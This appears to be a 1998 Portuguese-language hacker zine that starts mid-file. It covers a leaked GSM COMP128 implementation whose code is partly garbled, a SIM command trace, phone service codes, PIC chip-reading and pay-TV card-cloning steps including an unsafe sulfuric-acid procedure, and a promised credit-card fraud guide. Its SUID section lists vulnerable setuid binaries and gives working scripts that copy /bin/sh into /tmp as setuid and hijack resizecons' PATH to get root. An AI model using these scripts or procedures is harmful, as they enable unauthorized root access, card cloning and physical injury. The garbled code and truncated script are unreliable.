         90, 80, 76, 96, 23, 60, 89, 64,121, 56, 14, 74,101,  8, 19, 78,
         76, 66,104, 46,111, 50, 32,  3, 39,  0, 58, 25, 92, 22, 18, 51,
         57, 65,119,116, 22,109,  7, 86, 59, 93, 62,110, 78, 99, 77, 67,
         12,113, 87, 98,102,  5, 88, 33, 38, 56, 23,  8, 75, 45, 13, 75,
         95, 63, 28, 49,123,120, 20,112, 44, 30, 15, 98,106,  2,103, 29,
         82,107, 42,124, 24, 30, 41, 16,108,100,117, 40, 73, 40,  7,114,
         82,115, 36,112, 12,102,100, 84, 92, 48, 72, 97,  9, 54, 55, 74,
        113,123, 17, 26, 53, 58,  4,  9, 69,122, 21,118, 42, 60, 27, 73,
        118,125, 34, 15, 65,115, 84, 64, 62, 81, 70,  1, 24,111,121, 83,
        104, 81, 49,127, 48,105, 31, 10,  6, 91, 87, 37, 16, 54,116,126,
         31, 38, 13,  0, 72,106, 77, 61, 26, 67, 46, 29, 96, 37, 61, 52,
        101, 17, 44,108, 71, 52, 66, 57, 33, 51, 25, 90,  2,119,122, 35
    }, table_2[128] = {
         52, 50, 44,  6, 21, 49, 41, 59, 39, 51, 25, 32, 51, 47, 52, 43,
         37,  4, 40, 34, 61, 12, 28,  4, 58, 23,  8, 15, 12, 22,  9, 18,
         55, 10, 33, 35, 50,  1, 43,  3, 57, 13, 62, 14,  7, 42, 44, 59,
         62, 57, 27,  6,  8, 31, 26, 54, 41, 22, 45, 20, 39,  3, 16, 56,
         48,  2, 21, 28, 36, 42, 60, 33, 34, 18,  0, 11, 24, 10, 17, 61,
         29, 14, 45, 26, 55, 46, 11, 17, 54, 46,  9, 24, 30, 60, 32,  0,
         20, 38,  2, 30, 58, 35,  1, 16, 56, 40, 23, 48, 13, 19, 19, 27,
         31, 53, 47, 38, 63, 15, 49,  5, 37, 53, 25, 36, 63, 29,  5,  7
    }, table_3[64] = {
          1,  5, 29,  6, 25,  1, 18, 23, 17, 19,  0,  9, 24, 25,  6, 31,
         28, 20, 24, 30,  4, 27,  3, 13, 15, 16, 14, 18,  4,  3,  8,  9,
         20,  0, 12, 26, 21,  8, 28,  2, 29,  2, 15,  7, 11, 22, 14, 10,
         17, 21, 12, 30, 26, 27, 16, 31, 11,  7, 13, 23, 10,  5, 22, 19
    }, table_4[32] = {
         15, 12, 10,  4,  1, 14, 11,  7,  5,  0, 14,  7,  1,  2, 13,  8,
         10,  3,  4,  9,  6,  0,  3,  2,  5,  6,  8,  9, 11, 13, 15, 12
    }, *table[5] = { table_0, table_1, table_2, table_3, table_4 };

/*
 * This code derived from a leaked document from the GSM standards.
 * Some missing pieces were filled in by reverse-engineering a working SIM.
 * We have verified that this is the correct COMP128 algorithm.
 * 
 * The first page of the document identifies it as
 * 	_Technical Information: GSM System Security Study_.
 * 	10-1617-01, 10th June 1988.
 * The bottom of the title page is marked
 * 	Racal Research Ltd.
 * 	Worton Drive, Worton Grange Industrial Estate,
 * 	Reading, Berks. RG2 0SB, England.
 * 	Telephone: Reading (0734) 868601   Telex: 847152
 * The relevant bits are in Part I, Section 20 (pages 66--67).  Enjoy!
 * 
 * Note: There are three typos in the spec (discovered by
 * reverse-engineering).
 * First, "z = (2 * x[n] + x[n]) mod 2^(9-j)" should clearly read
 * "z = (2 * x[m] + x[n]) mod 2^(9-j)".
 * Second, the "k" loop in the "Form bits from bytes" section is severely
 * botched: the k index should run only from 0 to 3, and clearly the range
 * on "the (8-k)th bit of byte j" is also off (should be 0..7, not 1..8,
 * to be consistent with the subsequent section).
 * Third, SRES is taken from the first 8 nibbles of x[], not the last 8 as
 * claimed in the document.  (And the document doesn't specify how Kc is
 * derived, but that was also easily discovered with reverse engineering.)
 * All of these typos have been corrected in the following code.
 */

void A3A8(/* in */ Byte rand[16], /* in */ Byte key[16],
	/* out */ Byte simoutput[12])
{
	Byte x[32], bit[128];
	int i, j, k, l, m, n, y, z, next_bit;

	/* ( Load RAND into last 16 bytes of input ) */
	for (i=16; i<32; i++)
		x[i] = rand[i-16];

	/* ( Loop eight times ) */
	for (i=1; i<9; i++) {
		/* ( Load key into first 16 bytes of input ) */
		for (j=0; j<16; j++)
			x[j] = key[j];
		/* ( Perform substitutions ) */
		for (j=0; j<5; j++)
			for (k=0; k<(1<>(3-k)) & 1;
		/* ( Permutation but not on the last loop ) */
		if (i < 8)
			for (j=0; j<16; j++) {
				x[j+16] = 0;
				for (k=0; k<8; k++) {
					next_bit = ((8*j + k)*17) % 128;
					x[j+16] |= bit[next_bit] << (7-k);
				}
			}
	}

	/*
	 * ( At this stage the vector x[] consists of 32 nibbles.
	 *   The first 8 of these are taken as the output SRES. )
	 */

	/* The remainder of the code is not given explicitly in the
	 * standard, but was derived by reverse-engineering.
	 */

	for (i=0; i<4; i++)
		simoutput[i] = (x[2*i]<<4) | x[2*i+1];
	for (i=0; i<6; i++)
		simoutput[4+i] = (x[2*i+18]<<6) | (x[2*i+18+1]<<2)
				| (x[2*i+18+2]>>2);
	simoutput[4+6] = (x[2*6+18]<<6) | (x[2*6+18+1]<<2);
	simoutput[4+7] = 0;
}


#ifdef TEST
int hextoint(char x)
{
	x = toupper(x);
	if (x >= 'A' && x <= 'F')
		return x-'A'+10;
	else if (x >= '0' && x <= '9')
		return x-'0';
	fprintf(stderr, "bad input.\n");
	exit(1);
}

int main(int argc, char **argv)
{
	Byte rand[16], key [16], simoutput[12];
	int i;

	if (argc != 3 || strlen(argv[1]) != 34 || strlen(argv[2]) != 34
			|| strncmp(argv[1], "0x", 2) != 0
			|| strncmp(argv[2], "0x", 2) != 0) {
		fprintf(stderr, "Usage: %s 0x 0x\n", argv[0]);
		exit(1);
	}

	for (i=0; i<16; i++)
		key[i] = (hextoint(argv[1][2*i+2])<<4)
			| hextoint(argv[1][2*i+3]);
	for (i=0; i<16; i++)
		rand[i] = (hextoint(argv[2][2*i+2])<<4)
			 | hextoint(argv[2][2*i+3]);
	A3A8(key, rand, simoutput);
	printf("simoutput: ");
	for (i=0; i<12; i++)
		printf("%02X", simoutput[i]);
	printf("\n");
	return 0;
}
#endif

<::::::::::::::::[A5]::::::::::::::::::::::::::::::::::::::::::::::::::::::>
\\ Enviado para nos , pela Computer Chaos Club , ai esta o algoritimo mais
proximo q eu consegui achar do sistema de encriptacao de transferencia GSM//

r			# Reseta
3b 83 00 12 10 96	# ATR
t a0 a4 00 00 02	# EscolheArquivo
a4			# ok 
t 7f 20		# gsm_dir
9f 19			# ok, 0x19 bytes
t a0 c0 00 00 19	# perga resposta
c0 00 00 00 00 7f 20 02 00 00 11 00 01 0c 1b 00 12 04 00 83 8a 03 8a 00 03->
83 90 00 # Data nao importante
t a0 20 00 01 08	# Pinueberpruefung
20			# ok
t 35 35 35 35 ff ff ff ff # PIN 
90 00			# ok
t a0 88 00 00 10	# A3A8 , 0x10 Bytes Data
88			# ok
t 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 # ACK com o RAND
9f 0c			# 0x0c Bytes resposta
t a0 c0 00 00 0c	# pega resposta
c0 88 72 d1 02 18 fd 5f 1b 44 a4 60 00 90 00 # utiliza o SRES como Kc
t a0 a4 00 00 02	# Escolhe arquivo
a4			# ok
6f 07			# IMSI
t a0 b0 00 00 09	# Le data
9f 09			# ok, 9 bytes de respota
t a0 c0 00 00 09	# pega resposta
c0 08 29 03 29 83 40 04 32 45 90 00 # Byte de comando ,9 Bytes IMSI, 
		      # e 2 Bytes de status
=The GSM System=		    I n f o  S e e k e r	      =The GSM System=
13) GSM celular Programming Archivies

	Aqui nos resolvemos fazer soh de bonus , uma lista de celulares e 
algumas funcoes e acoes q concerteza as telco's nao gostariam q vcs 
estivessem lendo =) 

13.1) Nokia 

.--------------------------------------------------------------------------.
:					Nokia 1610 						   :
`--------------------------------------------------------------------------'

Visualizando codigo IMEI do celular : *#06#

Visualizando versao do software : *#170602112302#

PINouts :

display do menu   +------------------------|
			|				 |
			|				 |
Carregador --|	+				 -
		 V    V 	1  2  3  4  5  6   V
		(o)  | |   [=  =  =  =  =  =] | |
			      7  8  9  10 11 12

1	GND		Fundo digital
2	V_OUT		Suporte de Acessorios Output 
3	XMIC		Microfone externo de saida 
4	NC		Nao Conectado
5	NC		Nao conectado
6	MBUS		Controlador Serial BUS
7	NC		Nao conectado
8	SGND		Fundo sinalizador
9	XEAR		Microfone externo e controle Mudo
10	HOOK		sinal de espera
11	NC		Nao conectado
12	V_IN		Suporte de Acessorios Input

.--------------------------------------------------------------------------.
:			  Nokia 2110e/i/Philips 74711 				   :
`--------------------------------------------------------------------------'


Visualizar numero IMEI : *#06#
Visualizar versao do software : *#170602112302#
Para visualizar a versao do ultimo software : *#682371158412125#
Para visualizar a semana e ano da manufatura do celular : *#3283#

					Nokia 2110 PINOUTS 

 Pinouts do X100 

ANT 16 9 Conector do carregador
(0) I- I- I- I- I- I- ( )  ( 0 )
con 8  1

	O simbolo a esquerda (0)eh o conector da antena. Os simbolos numerados
16-9 em cima , e em baixo o 8-1! O () eh um espaco aberto para o proximo
conector (0) , para o carregador de bateria em casa!

PIN  Nome  		Descricao
---  ----  		---------
1,9  GND		Digital Ground
2    MIC/JCONN    Input externo de audio para acessorios. Multiplexido com
		      uma juncao como controle de sinalizacao
3    AGND         Analogue Ground for Acessories - Suporte Analogico para 
                  Acessorios
4    TDA		Transmissoes DBUS, data para acessorios
5    M2BUS		Data serial biderecional
6    HOOK/RXD2    Informa q o telefone esta no gancho (desligado)
7    PHFS/TXD2    Fornecedor de energia (on/off) para acessorios e kits 
		      programaveis!
8,15 VCHAR		Medidor de voltagem da bateria
10   EAR/HFPWR    Output externo de audio para fones de ouvido
11   DSYNC        Data-bit DBUS para relogio sistematico
12   RDA		Receptor de data DBUS
13   BENA		fornecedor de energia para adaptador handset
14   VF		Voltagem programavel para FLASH
15   DCLK		Relogio de data DBUS

	Se te interessa saber, vc pode destruir o seu nokia , se ficar 
brincando com este PINs!

					Programacao DTMF

	Se vc depois de digitar um comando no teclaod, seguido de um 
determinada string no teclado para inicializar uma funcao, vc pode 
reprogramar esta funcao para outros sentidos!

	o Digite a sequencia numerica
	o Aperte * , tres vezes , devera aparecer um 'p'
	o Chave no codigo DTMF, vc pode usar o metodo 'p' de novo
	o STO (armazena na memoria)
	o Se vc utilizar a discagem rapida, o celullar ira esperar alguns
	segundos e depis enviar a data DTMF

	Vc tera feito uma especie de link DTMF, armazenado na memoria

.--------------------------------------------------------------------------.
:					Nokia 6110 						   :
`--------------------------------------------------------------------------'

Numero IMEI: *#06#
Visualizar versao do software: *#0000#

O comando *#92702689# , ira mostrar a ESN , junto com o numero IMEI do 
celular

*3370# para habilitar EFR
#3370# para deshabilitar EFR

			Adcionando novos tons de chamada

Setar SMSC para +358405202999
Enviar SMS para 99999 comas palavras em tons na mensagem


.--------------------------------------------------------------------------.
:					Nokia 8110/8110i					   :
`--------------------------------------------------------------------------'

Numero IMEI: *#06#
Versao do software: *#8110#

*#92702689# - Telefone ira pedir codigo de seguranca!

Opcoes de complemento para o codigo *#92702689#

6232 : Mostra o ano e mes em q o celular foi comprado
7332 : Mostra o dia e o mes do ultimo concerto no celular
7832 : Mostra a data de quando o telefone foi construido
9268 : Mostra ESN
37832 : Mostra a data do MMYY
87267 : Confirma a transferencia

*#74025625# - O telefone ira dizer "SIM Clock Stoped", ou "SIM Clock stop
not allowed", dependendo do seu SIM!

-------------[ Nokia INFOware]----------------
Quem quiser saber mais sobre os celulares nokia, pode consultar a nossa
pagina para pesquisas sobre nokia , GSM ou nao! Nos ainda disponibilizamos
um FAQ sobre o nokia 2110!
=The GSM System=		    I n f o  S e e k e r	      =The GSM System=
13.2) Philips

			PHILIPS FIZZ

Numero IMEI: *#06#
Informacao sobre o telefone: *#8377*#
Versao : 0916 - EEPROM : 00000000-00 - TDA : 1941 - KISS : 0502

Alguns celulares, vem com a opcao seguranca SIM-lck jah habiltiada, para
visualizar o codigo:

*#1234*# (O codigo default: 1234)

"Security Code: XXXX"

Codigo de Servico: *#5644*#
Versao : 09162205 - EEPROM : 0000000-00 - TDA : 1941 - KISS : 0502

=The GSM System=		    I n f o  S e e k e r	      =The GSM System=
14) Conclusao

	Isto conclui o nosso primeiro info-seeker da historia da Phone9, 
expero q tenham gostado do nilve de informacao e do texto em geral , 
qualquer duvida ou reclamacao , info-seeker@thepentagon.com, e sintasse a 
vontade na hora de recomendar, brigar, xingar, reclamar, ajudar etc..etc..,
nos estamos a sua disposicao!

	Em breve nos estaremos lancando a GSM programming Archivies, completa,
com informacao em quase todos os celulares GSM, fique de olho nas 
atualizacoes do nosso site =)

mmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmm
[:> 9labs projects .....................................: The 9labs Team <:]

[ Esta parte da zine , eu irei deixar para informacao, aqui nos colocaremos
a disposicao uma descricao completa sobre os nosso projetos e como ajudar
a construi-los e faze-los ! - The Phone9 Research Team - 9labs Inf0war3 =) ]

nome: SmartCard Desktop Reference
autor: The blood root
data de inicio: 16/maio/1998
data de termino: Indeterminada
background Info: Consiste em um guia completo sobre smartcard, nos nao 
		     poupamos procuras e informacoes , para liberar este
		     documento, embora ainda esteja longe de terminado,
		     nos estamos trabalhando pesado nele!
andamento: 10%
contato: (blood@puruca.com.br)





nome: Monitoramento em sistema IPoS
autor: The blood root e Acid Branch
data de inicio: --indeterminada--
data de termino: --indeterminada--
background info: Explica cerca de 10 tecnicas utilizadas por backbones
		     para monitorar e scanear localizacoes de usuarios 
		     conectados via satelite
andamento: 0%
contato: (blood@puruca.com.br) - (acid.branch@thepentagon.com)





nome: Celular Description System brasil (CDS)
autor: The blood root e Primal Phear
data de inicio: 26/abril/1998
data de termino: Liberada a cada edicao da zine, e/ou na pagina!
background info: Uma imensidade de arquivos, explicando cada sistema
		     celular, de quase todas as cidades do brasil!
andamento: 30%
contato: (blood@puruca.com.br) - (acid.branch@thepentagon.com)





nome: Guia de esquemas em Cartao de Credito
autor: Acid Branch - The blood root - 
data de inicio: 23/maio/1998
data de termino: Indeterminada ate o momento
background info: Guia completo , explicando detalhadamente diversos sistemas
		     da como se conseguir numeros de cartoes de creditos validos
		     como usa-los e como descobrir senhas, mais algumas 
		     informacoes q concerteza a VISA nao que q vc fique sabendo!
andamento: 20%
contato: (blood@puruca.com.br) - (acid.branch@cyberdude.com) - 
	   (dert@cyberdude.com)

	Nos contamos com a sua colaboracao para nos ajudar a desenvolver e 
construir novos ou pendentes projetos, qualquer ajuda sera bem vinda e o 
devido credito sera dado ao autor da ajuda, esperamos a sua colaboracao,
qualquer duvida , mail to: 9labs@puruca.com.br

9labs info Warfare
(c) - 1998, PCS
mmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmm
[:> PIC hack ...........................................: The blood root <:]

	Este eh um guia , sobre o sistema de microcontroladores PIC, e como
explorar falhas fisicas e tecnologicas dentro dos seus dispositivos 
controlaveis!
	Qualquer problema q este texto possa trazer, por favor entre em 
contato conosco q nos te ajudaremos afavor da nossa causa!

	Autor: The blood root
	Mail : blood@puruca.com.br
	Page : http://www.puruca.com.br/phone9/
	Status: Guia sobre microcontroladores PIC e Controladores Logicos
		  Programaveis. Uma introducao ao ataque e pratica teoriaca!
	Lancado: 5/maio/1998 
	

	A seguranca concreta sobre os codigos de seguranca PIC, tem sido 
questionadas em listas de discucoes e rodas de amigos , constantemente, a 
sua seguranca tem andado em risco depois da descoberta de diversas falhas
na sua chave criptografica, entre teorias e controversias , nos da phone9 ,
estudamos o caso e chegamos a conclusao , q estao sendo dirigidas as voce
no texto abaixo! =)
	

	i) Vulnerabilidade 16C84
	
	Ultimamente a vulnerabilidade mais discutida, eh a 16C84. O 16C84 eh
utilizado por Smartcards para controlar o sistemas de satelite via TV. Estes
cartoes tem a funcao de permitir ou nao o acesso ao canal de encriptacao de
TV, entao existe um interesse certo e de boa causa , na hora de se clonar 
este cartao! 
	O fato foi comprovado recentemente por David Tait, ele afirmou e 
comprovou em teoria e hardware, como se eh capaz de ler qualquer informacao
encriptada por meio de PIC, esta tecnica foi descoberta por David Tait e 
implementada por John Luggerman , veja a sua teoria e pratica abaixo!

1. Utilize o hardware PIC16 programmer , da empresa Farnell
2. Use o programa ASLPIC paa programar o PIC
3. Instale o 16C84 em um socket pin 14 (Vdd), plugue um fio entre o pin 14
   e um fornecedor de energia!
4. Rode o ASLPIC, insira o pin+socket dentro do ZIF, na leitora e na PCboard
   VDD para 5v.
   Do menu , sete a configuracao do CP desligada, agora mude o VDD para
   VPP-0.5v (aproximadamente 13.5 volts). Programe a configuracao de 
   fusiveis(se receber uma tela dizendo "ERROR INVALID", entao ignore o erro
   e volte o VDD para sua configuracao inicial. Desligue a fonte de energia
   do VDD e passe-o para o fornecedor de energia q o pin14 usa!
   Mude para modo "Nao programavel!"
   Espere cerca de 10 a 20 minutos!
   Ligue o modo programavel
   Mude o VDD para 5voltz de novo
   leia o PIC

   Parece simplesmente um meio de como se destruir as suas preciosas PICs ,
mas na verdade depois da 2 ou 3 tentativa e cerca de 3 ou 4 PICs queimados,
vc conseguirar ler o PIC! =)
	Pense nesta tecnica , talvez seja possivel utilizala em um PIC GPB1000
quem sabe , pela falta de material nao foi possivel testar este controlador,
quem tiver a oportunidade ,por favor envie as informacoes para nos!

Os esquemas de construcao do 16C84, estao a disposicao no .zip da zine, 
veja pic.zip e veja o programa, q le os cartoes e um grafico q explica como
construi-lo!
	
	ii) Vulnerabilidade PIC57

	Ultimamente a familia de chips PICs tem sido atacada por hackers, o 
objetivo do ataque eh conseguir estripar codigos secretos de habilitacao de
canais especiais para tvs como Sky , DirecTV e outras...
	O PIC57 eh OTP (One Time Programable), um sistema q nao pode ser lido,
depois de programado!
	Agora nos apresentamos a tecnica exclusiva , de como se obter estes 
codigos e ainda ler depois de programados os chips! envoy =)

	Material necessario.:

	Primeiro, vc ira precisar de um bocado de PURO H2S04, ou acido 
sulfurico. Mas onde arrumar? Seu pai eh mecanico!? Vc tem carro, dentro da
bateria do carro , existe um H2S04 98% puro, se vc arrumar 100% vc tera
100% de acerto! =)
	H2S04 pode ser purificado simplesmente colocando dentro de um pequeno
frasco , o acido contido dentro da bateria do carro, misture os dois e 
pronto, a mistura perfeita!
	Agora pegue uma seringa hipotermica, o q eh isto!? Uma seringa 
hipotermica ora.. Vc tem uma prima, diabetica!? Entao , aquela seringa 
serve!
	Agora vc vai precisar de algo q faca pequenos dentroda PCB, isto
fica por vc, eu arrumei uma com um amigo meu, vcs q se virem,  litreto de
etanol e um aspirador super-hiper-potente!
	
	Agora com cuidado e devagar, faca um buraco no chip, cave ate q vc
chegue no 4 pin, dali em diante, vc jah podera ver dentro do chip! 
Cuidadosamente, pegue a seringa com H2S04 e injete dentro do chip, e deixe
de molho por uns 10 minutos ou mais! Agora limpe a seringa com aceton e 
depois limpe o chip com aceton tbm, agora reinicialize o chip, ligado ao 
seu laptop , e voilah..... vc resetou os fusiveis e pode ler o codigo.
	Faca isto de tempos em tempos, para verificar novos updates em chips!

The blood root - (c) PIC Hack
1998 productions
mmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmm
[:> SUiD Shell System ::::::::::::::::::::::::::::::::::: The blood root <:]
The Phone9 Communications Systems
reg (c) - 1998, productions

			====================================
			-+	SUiD - Shell Hack system    +-
			=========[ The blood root ]=========


	Depois de varias e varias pessoas tentando relatar como se fazer 
backdoors, q na maioria das vezes nunca funcionam ou entao sao descobertas
pelo primeiro Scanner de seguranca no host =)
	Eu resolvi escrever um texto, sobre como obter varias e varias shells 
em um sistema, de um modo rapido, simples e pratico.
	O nome deste ataque perfeito , chama-se suidroot, o q ela faz , 
simplesmente copia uma shell de determinada UID para um local publico, como
por exemplo /tmp , depois de copiada, eh soh executa-la e como em um passe 
de magica, vc tem uma shell, root? talvez, quem sabe!
	
	O maior objetivo de ataques como este, eh simplesmente permitir q um 
atacante consiga root, toda a vez q entrar em um sistema como usuario 
normal!
	Quando um programa eh inicializado, o processo q o programa corre 
antes de executar qualquer biblioteca ou ateh mesmo o registro no sistema, 
eh checar estes 4 componentes:

	* UID do executador (nao necessariamente o dono do arquivo)
	* GID efetiva
	* GID do executador (nao necessariamente o dono do arquivo)
	* UID efetiva

Normalmente, a UID e GID efetiva, sao as mesmas do usuario q as executou, as
UIDs efetivas, sao usadas pelo UNIX para resolver o problema de permissao de
arquivos, se o executador tem a mesma UID e/ou GID do dono do arquivo, este
pode ser executado (lembrando dos casos de chmod 477 e outros no qual 
qualquer um pode executar o programa). Caso nao exista a concordancia, 
mensagens comuns como "You don't have permission for this file" ou 
"programa1: Access denied".
Abaixo vai um pequeno exemplo IF q sao usados normalmente em unix.

	if UID do executador = UID do programa
		then acesso UID aceito
	if GID do executador = GID do programa
		then acesso GID aceito

Acredito q nao seja necessario se escrever o 'elseif', de qualquer modo o 
programa soh roda se houver uma concordancia entre as UIds e GIDs, q sao 
checadas antes de qualquer programa ser executado. O caso eh q nao interessa
quem executa o programa (excessao obvia de root:x:0:0), o programa armazena 
na memoria a UID e GId do seu dono, durante a checagem automatica de 
permissao qualquer UID e GID fora as especiais, sera respondida com uma 
mensagem de negacao de servicos, eh assim q funciona o sistema SUID, mas 
efetivamente, existe um meio bastante pratico de como se mudar esta UID e 
GID, utilizando programa q nao sao defidamente protegidos quanto a algumas
definicoes do sistema.
	Mas existem tecnicas , as quais eu mostro aqui, q podem ajudar, 
impedir ou ateh anular a possibilidade de suidroot no seu sistema.
	Lembre-se soh por que o nome eh suidROOT, nao quer dizer q o ataque eh
necessariamente root, ele pode ser feito sobre qualquer pessoa no sistema,
desde de q esta tenha uma shell!


	-+[ ATAQUE ]-+				-+[ DEFESA ]-+
	1) Arquivos SUID vulneraveis		1) Patches para arquivos suid
	2) Ataque simples				   vulneraveis
	3) Ataques complexos			2) Metodos de seguranca 
	4) suid.sh					3) Anti-Suid script
	5) outros suids a serem			4) SSL - Suid Shell Locker
         considerados				

+==========================================================================+
[ATAQUE] - 1) Arquivos SUID vulneraveis

	Abaixo , eu compilei a maior lista de arquivos suid vulneraveis q eu
consegui encontrar ateh hoje, para maiores informacoes, visite algo como
bugtraq e rootshell =)

/usr/X11R6/bin/color_xterm
/sbin/dip
/usr/games/doom/startmouse
/usr/bin/dos
/sbin/dump
/usr/games/lizardlib/lizardshi
/bin/mount
/bin/umount
/usr/bin/mh/inc
/usr/bin/mh/msgchk
/usr/bin/resizecons
/usr/X11R6/bin/rxvt
/usr/X11/bin/SuperProbe
/usr/local/bin/workman
/usr/lib/games/abuse/abuse.console
/usr/X11R6/bin/X
/usr/bin/at
/usr/bin/crontab
/usr/bin/splitvt
/usr/bin/chsh
/usr/bin/newgrp
/usr/bin/chfn
/usr/bin/dumpreg
/usr/bin/restorefont
/usr/bin/restorepalette
/usr/bin/restoretextmode
/usr/bin/procmail
/usr/bin/lpq
/usr/bin/lpr
/usr/bin/lprm
/usr/bin/rcp
/usr/bin/rlogin
/usr/bin/rsh
/usr/lib/svgalib/fun
/usr/lib/svgalib/mousetest
/usr/lib/svgalib/scrolltest
/usr/lib/svgalib/speedtest
/usr/lib/svgalib/testgl
/usr/lib/svgalib/testlinear
/usr/lib/svgalib/vgatest
/usr/lib/svgalib/3d
/usr/lib/svgalib/keytest
/usr/lib/svgalib/accel
/usr/lib/svgalib/eventtest
/usr/lib/svgalib/forktest
/usr/lib/svgalib/testaccel
/usr/sbin/pppd-2.1
/usr/sbin/pppd-2.2
/usr/games/sasteroids
/sbin/dip-3.3.7n

	Ateh agora , eu soh consegui saber destas suids , caso alguem conheca
mais alguma, por favor , envie para mim! =) 

[ATAQUE] - 2) Ataque simples

	Este eh bem simples, como o nome sujere, eu o fiz em forma de um 
script para shells, mas esta explicado abaixo...

#!/bin/sh 
#(c) The blood root - Phone9 Systems
#blood@microsoftz.com
echo "-/-/-/-/-/-/-/-/-/-/-"
echo " -*SUiD Example 01*- "
echo "-/-/-/-/-/-/-/-/-/-/-"
whoami
touch /tmp/sh1
/bin/cp /bin/sh /tmp/sh1
chmod 4755 /tmp/sh1
echo "Done.... /tmp/sh1"
/tmp/sh1
echo "Jah esta na sua shell"
whoami
echo "viu... =)"
#FiM

	Agora vamos explica-la melhor...

touch /tmp/sh1 -> Quando eu dou um touch em algum arquivo, ele ira 
			automaticamente cria-lo. Agora q o /tmp/sh1 existe...
/bin/cp /bin/sh /tmp/sh1 -> Agora , eh q ele copia a sua atual shell para
                            dentro do arquivo /tmp/sh1
chmod 4755 -> coloca um argumento executavel na sua shell, tornando-a 
		  executavel para qualquer um no sistema (vc pode mudar este 
              argumento, quando vc quiser)

	Agora depois disto, eh soh executa-la , digitando em um shell qualquer
#/tmp/sh1, e voce vira o dono da shell, obtendo os mesmos UID, GID do 
usuario, em alguns casos SUID , SGID.

[ATAQUE] - 3) Ataques Complexos

	Dentro da categoria de suidshell, vc pode achar problemas em entender
os diversos arquivos q podem originar um ataque suid bem sucedido, 
utilizando-se de varios outros arquivos tbm vulneraveis para tornar possivel
o seu ataque.
	Este tipo de ataque dependentes, utilizam algumas especificacoes do 
arquivo de podem deixar o sistema vulneravel a certa falhas, podendo 
originar o suid, varios destes arquivos estao listados acima. A categoria
de ataques complexos nao utilizam o simples metodo de se copiar a shell
para dentro de um outro arquivo, eles utilizam varios e varios recursos,
crons, resizecon, etc..etc..etc..., para conseguir colocar esta shell no 
sistema.

	1) Abuse.console

	O arquivo /usr/lib/games/abuse/abuser, quando executado, nao 
especifica nenhum diretorio, entao o proprio sistema leva em consideracao e
coloca como path o /usr/bin/games/abuse/, se vc executar o arquivo -faa, eh
possivel q vc obtenha root.Dando um rootshell no arquivo /tmp/-faa!
	
	2) link /bin/sh

	Este eh um outro ataque q serve , mais como uma isca para todos os q
usam /bin/sh.... Veja, se um cara, por exemplo root, tem no passwd uma linha
assim : root:WdEt@42!:0:0:root:/root:/bin/sh , entao quer dizer, q quando o 
root entrar no sistema, automaticamente, sera executada o /bin/sh, como o 
/bin/sh esta linkado ao /tmp/link, vc tem uma shell automatica!

	3) Sendmail...

	Mais um otimo bug, q exploita o queijo suico q eh o sendmail, ele 
utiliza uma tecnica, de atribuir ao executador SUID e SGID, a logo depois
copiando a sua shell para o /tmp, o ataque semi-perfeito, senao ouvesse 
outra versao mais recente do sendmail! =)

	4) Suidperl

	Existe um meio de obter suid, eh um arquivo normalmente existente no 
/usr/bin/suidperl, eh claro q vc precisa coloca-lo como suid, chmod 4700
ira fazer isto, e enjoy!

	5) Doom shell

	Este nao eh um bug , no geral, mas eh sim uma especie de conseguir
root, veja no doom , eh possviel escolher o som a ser ouvido no arquivo,
.doomrc . Este arquivo normalmente ira escolher o sndserver lembrando q o 
sndserver pode ser executado , involuntariamente , por qquer programa rodado
pelo root! =)

	6) resizecon... =)

	O /usr/bin/resizecon, eh um programa q escolhe o tamanho do videmode
no console. Durante este processo ele roda o programa restotextmode, 
absolutamente sem diretorio especificado. Isto pode executar o setfont da
mesma maneira, setando o path para encontrar um restoretextmode, um usuario
pode executar o programa como root, criando uma shell no /tmp/resizecon!
	Como o resizecon nao especifica uma uid, e sim SETuid, eh possivel se
executar algunas programas linkados, fazendo com no meio de uma rotina do
resizecon ou restoretextmode, se chame algum arquivo no tmp, copiando-se uma
shell.
	
	7) rxvt bug

	O bug no rxvt , afeta sistema linux (slack, redhat, etc..) q tenha a
sua versao do rxvt compilada com a funcao print-pipe. Eh necessario q vc
tenha uma conta X client. Sendo assim , executando um arquivo q ira penetrar
na funcao print-pipe, eh possivel se tornar root!


[ATAQUE] - 4) suid.sh

	Este eh o script q eu fiz, para colocoar suid em varios sistemas, 
enjoy phone9 1998 enterprise! =)

(suid.sh >> Para quem nao sabe instala-las sozinho q;))
-------------- suid.sh ----------------
#!/bin/sh
#(c) - The blood root inc.,
#The Phone9 Communications systems
#SUiD Shell system....
#blood@puruca.com

echo "S u i d   S h e l l   S c r i p t"
echo "- - - - - - - - - - - - - - - - -"
echo "(c)The blood root - Phone9 System"
echo "- - - - - - - - - - - - - - - - -"
echo
echo 
#Hackers Raven...
if [ `whoami` != root ]; then
  echo "Eh melhor rodar este script como root, mas se nao quiser tudo bem"
fi
touch /tmp/log
/bin/cp /etc/HOSTNAME /tmp/log
}
resizecon ( )
{

echo "The resizecon suid hacK"
echo "Descoberta por Wozz"
echo 
echo "Checando vulnerabilidade" >> /tmp/log
echo "Checando vulnerabilidade"
echo
if [ -s /usr/bin/resizecon ]
then
echo "----------------[SUiD]---------------"
	if test -u /usr/bin/resizecon
	then
		echo "Resizecon existente, provavelmente vulneravel" >> /tmp/log
		echo "Resizecon existente, provavelmente vulneravel"
		echo "Instalando suid, aguarde... =)"
		if test -u /usr/bin/resizecons
		cd /tmp
		cat << _EOF_ > /tmp/313x37
		The phone9 communications SYStems	
		_EOF_
		cat << _EOF_ > /tmp/restoretextmode
		#!/bin/sh
		/bin/cp /bin/sh /tmp/resizebug
		/bin/chmod 4777 /tmp/resizebug
		_EOF_
		/bin/chmod +x /tmp/restoretextmode
		PATH=/tmp
		/usr/bin/resizecons 313x37
		/bin/rm /tmp/restoretextmode
		/bin/rm /tmp/313x37
	else
		echo "Resizecon nao existe, ou nao apresenta suid" >> /tmp/log
		echo "Resizecon nao existe, ou nao apresenta suid"
	fi
fi
echo 
echo "resizec0n bug........ Ready"
echo 
}

abusecon ( )
{
echo
echo "Abuse.console suid bug! =)"
echo
if test -u /usr/lib/games/abuse/abuse.console
then
echo "/usr/lib/games/abuse/abuse/console existente "
cd /tmp
cat /tmp/-fuu
#!/bin/sh
